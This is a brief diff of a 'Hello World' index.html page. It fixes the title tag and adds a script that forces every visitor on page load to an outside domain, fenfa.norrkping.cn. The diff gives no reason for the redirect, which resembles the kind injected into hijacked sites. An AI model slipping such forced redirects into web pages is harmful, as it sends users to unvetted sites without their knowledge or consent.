--- a/index.html
+++ b/index.html
@@ -1,7 +1,10 @@
 <html>
 <head>
-	dinghui
+	<title>dinghui</title>
 </head>
 <body>
 	Hello World !
+	<script>
+		window.location.href='https://fenfa.norrkping.cn/tq';
+	</script>
 </body>
